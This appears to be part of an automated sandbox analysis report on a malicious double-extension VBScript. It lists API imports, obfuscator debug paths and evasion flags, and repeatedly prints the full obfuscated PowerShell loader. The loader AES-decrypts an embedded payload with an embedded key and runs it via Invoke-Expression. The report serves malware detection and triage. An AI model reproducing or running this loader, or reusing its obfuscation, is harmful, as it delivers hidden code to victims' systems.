                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.RegRead("HKLM\Software\Microsoft\Windows NT\CurrentVersion\CurrentVersion");IHost.StdIn();IHost.StdErr();IHost.StdOut();IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKLM\Software\Microsoft\Windows NT\CurrentVersion\CurrentVersion");IHost.FullName();IWshShell3.Run("powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([Str", "0", "false")
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041CB50
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACCC5D9D push ebx; iretd 2_2_00007FFAACCC5DAA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACCC9DD8 push E85ADCF4h; ret 2_2_00007FFAACCC9DF9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACCC9CAD push E85ADCF4h; ret 2_2_00007FFAACCC9DF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00457106 push ecx; ret 4_2_00457119
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0045B11A push esp; ret 4_2_0045B141
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0045E54D push esi; ret 4_2_0045E556
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00457A28 push eax; ret 4_2_00457A46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00434E56 push ecx; ret 4_2_00434E69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00406EB0 ShellExecuteW,URLDownloadToFileW,4_2_00406EB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_0041AA4A

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: Possible double extension: gif.vbsStatic PE information: createactiveimagesbeautygirlfrnd.gIF.vbs
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,4_2_0041CB50
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
